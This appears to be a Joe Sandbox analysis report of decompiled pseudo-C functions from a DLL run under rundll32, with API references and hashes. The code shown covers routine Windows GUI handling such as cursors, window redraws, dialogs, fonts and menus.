                                                                                                        							}
                                                                                                        						} else {
                                                                                                        							_t111 = 0x7919;
                                                                                                        						}
                                                                                                        					}
                                                                                                        				}
                                                                                                        				if( *((intOrPtr*)(_t113 + 0x6c)) == 0) {
                                                                                                        					__eflags = _t111;
                                                                                                        					if(__eflags != 0) {
                                                                                                        						SetCursor(LoadCursorA( *(E1000AB19(0x7923, _t111, _t113, __eflags) + 0xc), _t111 & 0x0000ffff));
                                                                                                        						_t58 = _v20.x;
                                                                                                        						__eflags = _t58 - _v44.right;
                                                                                                        						if(_t58 <= _v44.right) {
                                                                                                        							__eflags = _t58 - _v44.left;
                                                                                                        							if(_t58 >= _v44.left) {
                                                                                                        								_t26 =  &_v12;
                                                                                                        								 *_t26 = _v12 & 0x00000000;
                                                                                                        								__eflags =  *_t26;
                                                                                                        								L30:
                                                                                                        								_t59 = _v20.y;
                                                                                                        								__eflags = _t59 - _v44.bottom;
                                                                                                        								if(_t59 <= _v44.bottom) {
                                                                                                        									__eflags = _t59 - _v44.top;
                                                                                                        									if(_t59 >= _v44.top) {
                                                                                                        										_t34 =  &_v8;
                                                                                                        										 *_t34 = _v8 & 0x00000000;
                                                                                                        										__eflags =  *_t34;
                                                                                                        										L36:
                                                                                                        										_t112 = E1000F8F1(_t113);
                                                                                                        										_t61 =  *((intOrPtr*)(_t113 + 0x70));
                                                                                                        										__eflags = _t61 - 0x7923;
                                                                                                        										if(_t61 == 0x7923) {
                                                                                                        											L39:
                                                                                                        											_t98 = 1;
                                                                                                        											__eflags = 1;
                                                                                                        											L40:
                                                                                                        											__eflags = _t61 - 0x7923;
                                                                                                        											if(_t61 == 0x7923) {
                                                                                                        												L43:
                                                                                                        												_t63 = 1;
                                                                                                        												__eflags = 1;
                                                                                                        												L44:
                                                                                                        												 *((intOrPtr*)( *_t112 + 0x184))( &_v28, _v12, _v8, _t63, _t98);
                                                                                                        												E10011739(_t113, 0);
                                                                                                        												_t69 = E10025684(0x1005c558, E1000E5E5(0, _t113, _t114, GetParent( *(_t112 + 0x20))));
                                                                                                        												__eflags = _t69;
                                                                                                        												_push(1);
                                                                                                        												_push(_v24);
                                                                                                        												_push(_v28);
                                                                                                        												if(_t69 != 0) {
                                                                                                        													 *((intOrPtr*)( *_t69 + 0x17c))(_t112);
                                                                                                        												} else {
                                                                                                        													 *((intOrPtr*)( *_t112 + 0x13c))();
                                                                                                        												}
                                                                                                        												UpdateWindow( *(_t113 + 0x20));
                                                                                                        												__eflags =  *((intOrPtr*)(_t113 + 0x64)) - 0x10;
                                                                                                        												return E100117F5(_t113, 0x10098d40,  *((intOrPtr*)(_t113 + 0x64)) - 0x10,  *((intOrPtr*)(_t113 + 0x68)) - 0x10, 0, 0, 0x51);
                                                                                                        											}
                                                                                                        											__eflags = _t61 - 0x7921;
                                                                                                        											if(_t61 == 0x7921) {
                                                                                                        												goto L43;
                                                                                                        											}
                                                                                                        											_t63 = 0;
                                                                                                        											goto L44;
                                                                                                        										}
                                                                                                        										__eflags = _t61 - 0x7922;
                                                                                                        										if(_t61 == 0x7922) {
                                                                                                        											goto L39;
                                                                                                        										}
                                                                                                        										_t98 = 0;
                                                                                                        										goto L40;
                                                                                                        									}
                                                                                                        									_t79 = _t59 - _v44.top;
                                                                                                        									__eflags = _t79;
                                                                                                        									L34:
                                                                                                        									_v8 = _t79;
                                                                                                        									goto L36;
                                                                                                        								}
                                                                                                        								_t79 = _t59 - _v44.bottom;
                                                                                                        								goto L34;
                                                                                                        							}
                                                                                                        							_t80 = _t58 - _v44.left;
                                                                                                        							__eflags = _t80;
                                                                                                        							L28:
                                                                                                        							_v12 = _t80;
                                                                                                        							goto L30;
                                                                                                        						}
                                                                                                        						_t80 = _t58 - _v44.right;
                                                                                                        						goto L28;
                                                                                                        					}
                                                                                                        					return SetCursor( *(_t113 + 0x74));
                                                                                                        				}
                                                                                                        				KillTimer( *(_t113 + 0x20), 0xe000);
                                                                                                        				ReleaseCapture();
                                                                                                        				SetCursor(0);
                                                                                                        				_t91 = E1000F8F1(_t113);
                                                                                                        				_t87 =  *((intOrPtr*)( *_t113 + 0x60))();
                                                                                                        				_t108 =  *(_t91 + 0x58);
                                                                                                        				if(_t108 != 0) {
                                                                                                        					_t87 =  *((intOrPtr*)( *_t108 + 4))(1);
                                                                                                        				}
                                                                                                        				 *(_t91 + 0x58) =  *(_t91 + 0x58) & 0x00000000;
                                                                                                        				return _t87;
                                                                                                        			}































                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Cursor$Window$CaptureKillLoadParentRectReleaseTimerUpdate
                                                                                                        • String ID:
                                                                                                        • API String ID: 2135910768-0
                                                                                                        • Opcode ID: 9f198ea6b06c1f53964a0dec54738a3dea3d1376fd2faf82cfe833c5848d3e85
                                                                                                        • Instruction ID: 25c125244b2828e789b43927dcdcd2e2d52d321b5a7084e5742444ac35df19d6
                                                                                                        • Opcode Fuzzy Hash: 9f198ea6b06c1f53964a0dec54738a3dea3d1376fd2faf82cfe833c5848d3e85
                                                                                                        • Instruction Fuzzy Hash: F5519F31A04106AFDB1ADFA4C8E9AAE77F5FB44342F218429E906EB391D734ED41DB50
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 100%
                                                                                                        			E1002BDA5(void* __ecx, int _a4) {
                                                                                                        				int _v8;
                                                                                                        				struct tagRECT _v24;
                                                                                                        				long _t39;
                                                                                                        				int _t42;
                                                                                                        				int _t43;
                                                                                                        				int _t62;
                                                                                                        				int _t66;
                                                                                                        				void* _t68;
                                                                                                        				long _t69;
                                                                                                        				int _t71;
                                                                                                        
                                                                                                        				_t69 = _a4;
                                                                                                        				_t68 = __ecx;
                                                                                                        				_t39 = DefWindowProcA( *(__ecx + 0x20), 0x46, 0, _t69);
                                                                                                        				if(( *(_t69 + 0x18) & 0x00000001) == 0) {
                                                                                                        					GetWindowRect( *(_t68 + 0x20),  &_v24);
                                                                                                        					_t42 = _a4;
                                                                                                        					_t66 =  *(_t42 + 0x10);
                                                                                                        					_t71 = _v24.right - _v24.left;
                                                                                                        					_t62 = _v24.bottom - _v24.top;
                                                                                                        					_t43 =  *(_t42 + 0x14);
                                                                                                        					_v8 = _t66;
                                                                                                        					_a4 = _t43;
                                                                                                        					if(_t66 != _t71 && ( *(_t68 + 0x80) & 0x00000400) != 0) {
                                                                                                        						SetRect( &_v24, _t66 -  *0x10099120, 0, _t66, _t43);
                                                                                                        						InvalidateRect( *(_t68 + 0x20),  &_v24, 1);
                                                                                                        						SetRect( &_v24, _t71 -  *0x10099120, 0, _t71, _a4);
                                                                                                        						InvalidateRect( *(_t68 + 0x20),  &_v24, 1);
                                                                                                        						_t66 = _v8;
                                                                                                        						_t43 = _a4;
                                                                                                        					}
                                                                                                        					if(_t43 != _t62 && ( *(_t68 + 0x80) & 0x00000800) != 0) {
                                                                                                        						SetRect( &_v24, 0, _t43 -  *0x10099124, _t66, _t43);
                                                                                                        						InvalidateRect( *(_t68 + 0x20),  &_v24, 1);
                                                                                                        						SetRect( &_v24, 0, _t62 -  *0x10099124, _v8, _t62);
                                                                                                        						_t43 = InvalidateRect( *(_t68 + 0x20),  &_v24, 1);
                                                                                                        					}
                                                                                                        					return _t43;
                                                                                                        				}
                                                                                                        				return _t39;
                                                                                                        			}














                                                                                                        APIs
                                                                                                        • DefWindowProcA.USER32(?,00000046,00000000,?), ref: 1002BDBA
                                                                                                        • GetWindowRect.USER32 ref: 1002BDD2
                                                                                                        • SetRect.USER32 ref: 1002BE11
                                                                                                        • InvalidateRect.USER32(?,?,00000001), ref: 1002BE20
                                                                                                        • SetRect.USER32 ref: 1002BE37
                                                                                                        • InvalidateRect.USER32(?,?,00000001), ref: 1002BE46
                                                                                                        • SetRect.USER32 ref: 1002BE76
                                                                                                        • InvalidateRect.USER32(?,?,00000001), ref: 1002BE81
                                                                                                        • SetRect.USER32 ref: 1002BE98
                                                                                                        • InvalidateRect.USER32(?,?,00000001), ref: 1002BEA3
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Rect$Invalidate$Window$Proc
                                                                                                        • String ID:
                                                                                                        • API String ID: 570070710-0
                                                                                                        • Opcode ID: 97afb3ad9f55a30b7bc3532130c531b972377fdf4c94535283d23edbb78eaea5
                                                                                                        • Instruction ID: 61371ef8346fa296272de4c130f90a8bd45dfee07fb1d4490de320c05c370245
                                                                                                        • Opcode Fuzzy Hash: 97afb3ad9f55a30b7bc3532130c531b972377fdf4c94535283d23edbb78eaea5
                                                                                                        • Instruction Fuzzy Hash: F6310C7290061ABFEB14DFA4CD88FAE7BBDFB08344F110115FA45A61A0D770AE14CBA1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 97%
                                                                                                        			E10009F04(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                        				signed int _t65;
                                                                                                        				signed int _t72;
                                                                                                        				signed int _t74;
                                                                                                        				struct HWND__* _t75;
                                                                                                        				signed int _t78;
                                                                                                        				signed int _t95;
                                                                                                        				intOrPtr* _t103;
                                                                                                        				signed int _t110;
                                                                                                        				void* _t124;
                                                                                                        				signed int _t129;
                                                                                                        				DLGTEMPLATE* _t130;
                                                                                                        				struct HWND__* _t131;
                                                                                                        				void* _t132;
                                                                                                        
                                                                                                        				_t128 = __esi;
                                                                                                        				_t124 = __edx;
                                                                                                        				_t104 = __ecx;
                                                                                                        				_push(0x3c);
                                                                                                        				E1003EEB5(0x100530fc, __ebx, __edi, __esi);
                                                                                                        				_t103 = __ecx;
                                                                                                        				 *((intOrPtr*)(_t132 - 0x20)) = __ecx;
                                                                                                        				_t136 =  *(_t132 + 0x10);
                                                                                                        				if( *(_t132 + 0x10) == 0) {
                                                                                                        					 *(_t132 + 0x10) =  *(E1000AB19(__ecx, 0, __esi, _t136) + 0xc);
                                                                                                        				}
                                                                                                        				_t129 =  *(E1000AB19(_t103, 0, _t128, _t136) + 0x3c);
                                                                                                        				 *(_t132 - 0x28) = _t129;
                                                                                                        				 *(_t132 - 0x14) = 0;
                                                                                                        				 *(_t132 - 4) = 0;
                                                                                                        				E1001120A(_t103, _t104, 0, _t129, _t136, 0x10);
                                                                                                        				E1001120A(_t103, _t104, 0, _t129, _t136, 0x7c000);
                                                                                                        				if(_t129 == 0) {
                                                                                                        					_t130 =  *(_t132 + 8);
                                                                                                        					L7:
                                                                                                        					__eflags = _t130;
                                                                                                        					if(_t130 == 0) {
                                                                                                        						L4:
                                                                                                        						_t65 = 0;
                                                                                                        						L32:
                                                                                                        						return E1003EF21(_t65);
                                                                                                        					}
                                                                                                        					E10001DB0(_t132 - 0x1c, E10007F7E());
                                                                                                        					 *(_t132 - 4) = 1;
                                                                                                        					 *((intOrPtr*)(_t132 - 0x18)) = 0;
                                                                                                        					__eflags = E1002AB2C(_t103, 0, _t132, __eflags, _t130, _t132 - 0x1c, _t132 - 0x18);
                                                                                                        					__eflags =  *0x10099164; // 0x0
                                                                                                        					_t72 = 0 | __eflags == 0x00000000;
                                                                                                        					if(__eflags == 0) {
                                                                                                        						L14:
                                                                                                        						__eflags = _t72;
                                                                                                        						if(__eflags == 0) {
                                                                                                        							L17:
                                                                                                        							 *(_t103 + 0x44) =  *(_t103 + 0x44) | 0xffffffff;
                                                                                                        							 *(_t103 + 0x3c) =  *(_t103 + 0x3c) | 0x00000010;
                                                                                                        							E1001034E(0, __eflags, _t103);
                                                                                                        							_t74 =  *(_t132 + 0xc);
                                                                                                        							__eflags = _t74;
                                                                                                        							if(_t74 != 0) {
                                                                                                        								_t75 =  *(_t74 + 0x20);
                                                                                                        							} else {
                                                                                                        								_t75 = 0;
                                                                                                        							}
                                                                                                        							_t131 = CreateDialogIndirectParamA( *(_t132 + 0x10), _t130, _t75, E1000998B, 0);
                                                                                                        							E10001280( *((intOrPtr*)(_t132 - 0x1c)) + 0xfffffff0, _t124);
                                                                                                        							 *(_t132 - 4) =  *(_t132 - 4) | 0xffffffff;
                                                                                                        							_t110 =  *(_t132 - 0x28);
                                                                                                        							__eflags = _t110;
                                                                                                        							if(__eflags != 0) {
                                                                                                        								 *((intOrPtr*)( *_t110 + 0x18))(_t132 - 0x48);
                                                                                                        								__eflags = _t131;
                                                                                                        								if(__eflags != 0) {
                                                                                                        									 *((intOrPtr*)( *_t103 + 0x12c))(0);
                                                                                                        								}
                                                                                                        							}
                                                                                                        							_t78 = E1000E68D(_t103, 0, __eflags);
                                                                                                        							__eflags = _t78;
                                                                                                        							if(_t78 == 0) {
                                                                                                        								 *((intOrPtr*)( *_t103 + 0x114))();
                                                                                                        							}
                                                                                                        							__eflags = _t131;
                                                                                                        							if(_t131 != 0) {
                                                                                                        								__eflags =  *(_t103 + 0x3c) & 0x00000010;
                                                                                                        								if(( *(_t103 + 0x3c) & 0x00000010) == 0) {
                                                                                                        									DestroyWindow(_t131);
                                                                                                        									_t131 = 0;
                                                                                                        									__eflags = 0;
                                                                                                        								}
                                                                                                        							}
                                                                                                        							__eflags =  *(_t132 - 0x14);
                                                                                                        							if( *(_t132 - 0x14) != 0) {
                                                                                                        								GlobalUnlock( *(_t132 - 0x14));
                                                                                                        								GlobalFree( *(_t132 - 0x14));
                                                                                                        							}
                                                                                                        							__eflags = _t131;
                                                                                                        							_t59 = _t131 != 0;
                                                                                                        							__eflags = _t59;
                                                                                                        							_t65 = 0 | _t59;
                                                                                                        							goto L32;
                                                                                                        						}
                                                                                                        						L15:
                                                                                                        						E1002AAF5(_t103, _t132 - 0x38, 0, _t132, _t130);
                                                                                                        						 *(_t132 - 4) = 2;
                                                                                                        						E1002AA53(_t132 - 0x38,  *((intOrPtr*)(_t132 - 0x18)));
                                                                                                        						 *(_t132 - 0x14) = E1002A78B(_t132 - 0x38);
                                                                                                        						 *(_t132 - 4) = 1;
                                                                                                        						E1002A77D(_t132 - 0x38);
                                                                                                        						__eflags =  *(_t132 - 0x14);
                                                                                                        						if(__eflags != 0) {
                                                                                                        							_t130 = GlobalLock( *(_t132 - 0x14));
                                                                                                        						}
                                                                                                        						goto L17;
                                                                                                        					}
                                                                                                        					__eflags = _t72;
                                                                                                        					if(_t72 != 0) {
                                                                                                        						goto L15;
                                                                                                        					}
                                                                                                        					__eflags = GetSystemMetrics(0x2a);
                                                                                                        					if(__eflags == 0) {
                                                                                                        						goto L17;
                                                                                                        					}
                                                                                                        					_t95 = E10006D40(_t103, _t132 - 0x1c, 0, _t130, _t132, "MS Shell Dlg");
                                                                                                        					__eflags = _t95;
                                                                                                        					_t72 = 0 | _t95 == 0x00000000;
                                                                                                        					__eflags = _t72;
                                                                                                        					if(__eflags == 0) {
                                                                                                        						goto L17;
                                                                                                        					}
                                                                                                        					__eflags =  *((short*)(_t132 - 0x18)) - 8;
                                                                                                        					if( *((short*)(_t132 - 0x18)) == 8) {
                                                                                                        						 *((intOrPtr*)(_t132 - 0x18)) = 0;
                                                                                                        					}
                                                                                                        					goto L14;
                                                                                                        				}
                                                                                                        				_push(_t132 - 0x48);
                                                                                                        				if( *((intOrPtr*)( *_t103 + 0x12c))() != 0) {
                                                                                                        					_t130 =  *((intOrPtr*)( *_t129 + 0x14))(_t132 - 0x48,  *(_t132 + 8));
                                                                                                        					goto L7;
                                                                                                        				}
                                                                                                        				goto L4;
                                                                                                        			}


                                                                                                        APIs
                                                                                                        • __EH_prolog3_catch.LIBCMT ref: 10009F0B
                                                                                                        • GetSystemMetrics.USER32 ref: 10009FBC
                                                                                                        • GlobalLock.KERNEL32 ref: 1000A025
                                                                                                        • CreateDialogIndirectParamA.USER32(?,?,?,1000998B,00000000), ref: 1000A054
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CreateDialogGlobalH_prolog3_catchIndirectLockMetricsParamSystem
                                                                                                        • String ID: MS Shell Dlg
                                                                                                        • API String ID: 1736106359-76309092
                                                                                                        • Opcode ID: 00eff9cbe39943637328a426b7797b3afdc7c3b1945d75ce353effab8c3cc5ae
                                                                                                        • Instruction ID: ef2fac96761e69f219d17246f0f3a23b79f49f0debd93612bc35c10ebe38fe1a
                                                                                                        • Opcode Fuzzy Hash: 00eff9cbe39943637328a426b7797b3afdc7c3b1945d75ce353effab8c3cc5ae
                                                                                                        • Instruction Fuzzy Hash: C751F33090020ADFEB15DFA4CC859EEBBB5EF45380F144669F802E7199DB309E80CB51
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 95%
                                                                                                        			E1002AA53(intOrPtr __ecx, signed int _a4) {
                                                                                                        				signed int _v8;
                                                                                                        				char _v40;
                                                                                                        				void _v68;
                                                                                                        				intOrPtr _v72;
                                                                                                        				void* __ebx;
                                                                                                        				void* __edi;
                                                                                                        				void* __esi;
                                                                                                        				signed int _t12;
                                                                                                        				void* _t14;
                                                                                                        				char* _t23;
                                                                                                        				void* _t29;
                                                                                                        				signed short _t30;
                                                                                                        				struct HDC__* _t31;
                                                                                                        				signed int _t32;
                                                                                                        
                                                                                                        				_t12 =  *0x10072650; // 0xb5e27fef
                                                                                                        				_v8 = _t12 ^ _t32;
                                                                                                        				_t31 = GetStockObject;
                                                                                                        				_t30 = 0xa;
                                                                                                        				_v72 = __ecx;
                                                                                                        				_t23 = "System";
                                                                                                        				_t14 = GetStockObject(0x11);
                                                                                                        				if(_t14 != 0) {
                                                                                                        					L2:
                                                                                                        					if(GetObjectA(_t14, 0x3c,  &_v68) != 0) {
                                                                                                        						_t23 =  &_v40;
                                                                                                        						_t31 = GetDC(0);
                                                                                                        						if(_v68 < 0) {
                                                                                                        							_v68 =  ~_v68;
                                                                                                        						}
                                                                                                        						_t30 = MulDiv(_v68, 0x48, GetDeviceCaps(_t31, 0x5a)) & 0x0000ffff;
                                                                                                        						ReleaseDC(0, _t31);
                                                                                                        					}
                                                                                                        					L6:
                                                                                                        					_t16 = _a4;
                                                                                                        					if(_a4 == 0) {
                                                                                                        						_t16 = _t30 & 0x0000ffff;
                                                                                                        					}
                                                                                                        					return E10039F21(E1002A904(_t23, _v72, _t29, _t31, _t23, _t16), _t23, _v8 ^ _t32, _t29, _t30, _t31);
                                                                                                        				}
                                                                                                        				_t14 = GetStockObject(0xd);
                                                                                                        				if(_t14 == 0) {
                                                                                                        					goto L6;
                                                                                                        				}
                                                                                                        				goto L2;
                                                                                                        			}


                                                                                                        APIs
                                                                                                        • GetStockObject.GDI32(00000011), ref: 1002AA79
                                                                                                        • GetStockObject.GDI32(0000000D), ref: 1002AA81
                                                                                                        • GetObjectA.GDI32(00000000,0000003C,?), ref: 1002AA8E
                                                                                                        • GetDC.USER32(00000000), ref: 1002AA9D
                                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 1002AAB1
                                                                                                        • MulDiv.KERNEL32(00000000,00000048,00000000), ref: 1002AABD
                                                                                                        • ReleaseDC.USER32 ref: 1002AAC9
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Object$Stock$CapsDeviceRelease
                                                                                                        • String ID: System
                                                                                                        • API String ID: 46613423-3470857405
                                                                                                        • Opcode ID: 25c80ee23c7fbc883c62e90c00c3747b1b3031c44122ec4f620ce27ed8e3d84c
                                                                                                        • Instruction ID: 9cbf8e9a3f447664e9375befc8fea994b37f0c25bf9610474acd094e2d94b04c
                                                                                                        • Opcode Fuzzy Hash: 25c80ee23c7fbc883c62e90c00c3747b1b3031c44122ec4f620ce27ed8e3d84c
                                                                                                        • Instruction Fuzzy Hash: 50119175600228EBEB10DBA1DD85FAE7BB8EF05781F40001AFA41FA180DB709E02CB61
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 88%
                                                                                                        			E100142CB(intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8, int _a12) {
                                                                                                        				intOrPtr* _v8;
                                                                                                        				intOrPtr _v12;
                                                                                                        				int _v16;
                                                                                                        				signed int _v32;
                                                                                                        				intOrPtr _v36;
                                                                                                        				signed int _v40;
                                                                                                        				int _v44;
                                                                                                        				char _v48;
                                                                                                        				void* __ebx;
                                                                                                        				void* __edi;
                                                                                                        				void* __esi;
                                                                                                        				void* __ebp;
                                                                                                        				void* _t52;
                                                                                                        				intOrPtr* _t53;
                                                                                                        				struct HMENU__* _t57;
                                                                                                        				int _t58;
                                                                                                        				int _t59;
                                                                                                        				struct HMENU__* _t60;
                                                                                                        				int _t62;
                                                                                                        				int _t64;
                                                                                                        				signed int _t66;
                                                                                                        				int _t67;
                                                                                                        				struct HMENU__* _t68;
                                                                                                        				int _t70;
                                                                                                        				intOrPtr* _t74;
                                                                                                        				intOrPtr* _t75;
                                                                                                        				int _t76;
                                                                                                        				int _t77;
                                                                                                        				struct HMENU__* _t87;
                                                                                                        				intOrPtr _t89;
                                                                                                        
                                                                                                        				_t78 = __ecx;
                                                                                                        				_t75 = __ecx;
                                                                                                        				_v8 = __ecx;
                                                                                                        				_t52 = E10029945( *((intOrPtr*)(__ecx + 0x20)));
                                                                                                        				if(_a12 == 0) {
                                                                                                        					_t53 = __ecx + 0x80;
                                                                                                        					_t89 = _a4;
                                                                                                        					if( *_t53 == 0) {
                                                                                                        						L3:
                                                                                                        						_t94 = _t89;
                                                                                                        						if(_t89 == 0) {
                                                                                                        							E1000836F(_t75, _t78, 0, _t89, _t94);
                                                                                                        						}
                                                                                                        						E10007A5B( &_v48);
                                                                                                        						_v36 = _t89;
                                                                                                        						if( *((intOrPtr*)(E1000A5E4(_t75, 0, _t89, _t94) + 0x78)) !=  *(_t89 + 4)) {
                                                                                                        							_t57 = GetMenu( *(_t75 + 0x20));
                                                                                                        							__eflags = _t57;
                                                                                                        							if(_t57 == 0) {
                                                                                                        								goto L16;
                                                                                                        							}
                                                                                                        							_t82 = _t75;
                                                                                                        							_t68 = E1000FBCD(_t75, _t75, GetMenu);
                                                                                                        							__eflags = _t68;
                                                                                                        							if(_t68 == 0) {
                                                                                                        								goto L16;
                                                                                                        							}
                                                                                                        							_t87 = GetMenu( *(_t68 + 0x20));
                                                                                                        							__eflags = _t87;
                                                                                                        							if(_t87 == 0) {
                                                                                                        								goto L16;
                                                                                                        							}
                                                                                                        							_t70 = GetMenuItemCount(_t87);
                                                                                                        							_t77 = 0;
                                                                                                        							__eflags = _t70;
                                                                                                        							_a12 = _t70;
                                                                                                        							if(_t70 <= 0) {
                                                                                                        								L15:
                                                                                                        								_t75 = _v8;
                                                                                                        								goto L16;
                                                                                                        							} else {
                                                                                                        								goto L11;
                                                                                                        							}
                                                                                                        							while(1) {
                                                                                                        								L11:
                                                                                                        								__eflags = GetSubMenu(_t87, _t77) -  *(_t89 + 4);
                                                                                                        								if(__eflags == 0) {
                                                                                                        									break;
                                                                                                        								}
                                                                                                        								_t77 = _t77 + 1;
                                                                                                        								__eflags = _t77 - _a12;
                                                                                                        								if(_t77 < _a12) {
                                                                                                        									continue;
                                                                                                        								}
                                                                                                        								goto L15;
                                                                                                        							}
                                                                                                        							_push(_t87);
                                                                                                        							_v12 = E1002AF88(_t77, _t82, _t87, _t89, __eflags);
                                                                                                        							goto L15;
                                                                                                        						} else {
                                                                                                        							_v12 = _t89;
                                                                                                        							L16:
                                                                                                        							_t58 = GetMenuItemCount( *(_t89 + 4));
                                                                                                        							_v40 = _v40 & 0x00000000;
                                                                                                        							_v16 = _t58;
                                                                                                        							if(_t58 <= 0) {
                                                                                                        								L36:
                                                                                                        								return _t58;
                                                                                                        							}
                                                                                                        							do {
                                                                                                        								_t59 = GetMenuItemID( *(_t89 + 4), _v40);
                                                                                                        								_v44 = _t59;
                                                                                                        								if(_t59 == 0) {
                                                                                                        									goto L35;
                                                                                                        								}
                                                                                                        								if(_t59 != 0xffffffff) {
                                                                                                        									_v32 = _v32 & 0x00000000;
                                                                                                        									__eflags =  *(_t75 + 0x54);
                                                                                                        									if( *(_t75 + 0x54) == 0) {
                                                                                                        										L27:
                                                                                                        										_t60 = 0;
                                                                                                        										__eflags = 0;
                                                                                                        										L28:
                                                                                                        										_push(_t60);
                                                                                                        										L29:
                                                                                                        										_push(_t75);
                                                                                                        										E10007A81( &_v48);
                                                                                                        										_t62 = GetMenuItemCount( *(_t89 + 4));
                                                                                                        										_t76 = _t62;
                                                                                                        										if(_t76 >= _v16) {
                                                                                                        											L34:
                                                                                                        											_v16 = _t76;
                                                                                                        											_t75 = _v8;
                                                                                                        											goto L35;
                                                                                                        										}
                                                                                                        										_v40 = _v40 + _t62 - _v16;
                                                                                                        										while(_v40 < _t76) {
                                                                                                        											_t64 = GetMenuItemID( *(_t89 + 4), _v40);
                                                                                                        											__eflags = _t64 - _v44;
                                                                                                        											if(_t64 != _v44) {
                                                                                                        												goto L34;
                                                                                                        											}
                                                                                                        											_t43 =  &_v40;
                                                                                                        											 *_t43 = _v40 + 1;
                                                                                                        											__eflags =  *_t43;
                                                                                                        										}
                                                                                                        										goto L34;
                                                                                                        									}
                                                                                                        									__eflags = _t59 - 0xf000;
                                                                                                        									if(_t59 >= 0xf000) {
                                                                                                        										goto L27;
                                                                                                        									}
                                                                                                        									_t60 = 1;
                                                                                                        									goto L28;
                                                                                                        								}
                                                                                                        								_t66 = E1000D005(_t89, _v40);
                                                                                                        								_v32 = _t66;
                                                                                                        								if(_t66 == 0) {
                                                                                                        									goto L35;
                                                                                                        								}
                                                                                                        								_t67 = GetMenuItemID( *(_t66 + 4), 0);
                                                                                                        								_v44 = _t67;
                                                                                                        								if(_t67 != 0 && _t67 != 0xffffffff) {
                                                                                                        									_push(0);
                                                                                                        									goto L29;
                                                                                                        								}
                                                                                                        								L35:
                                                                                                        								_v40 = _v40 + 1;
                                                                                                        								_t58 = _v40;
                                                                                                        							} while (_t58 < _v16);
                                                                                                        							goto L36;
                                                                                                        						}
                                                                                                        					}
                                                                                                        					_t74 =  *_t53;
                                                                                                        					_t78 = _t74;
                                                                                                        					_t58 =  *((intOrPtr*)( *_t74 + 0x74))(_t89, _a8, 0);
                                                                                                        					if(_t58 != 0) {
                                                                                                        						goto L36;
                                                                                                        					}
                                                                                                        					goto L3;
                                                                                                        				}
                                                                                                        				return _t52;
                                                                                                        			}

































                                                                                                        0x10014372
                                                                                                        0x10014375
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10014377
                                                                                                        0x10014378
                                                                                                        0x1001437b
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1001437d
                                                                                                        0x1001437f
                                                                                                        0x10014385
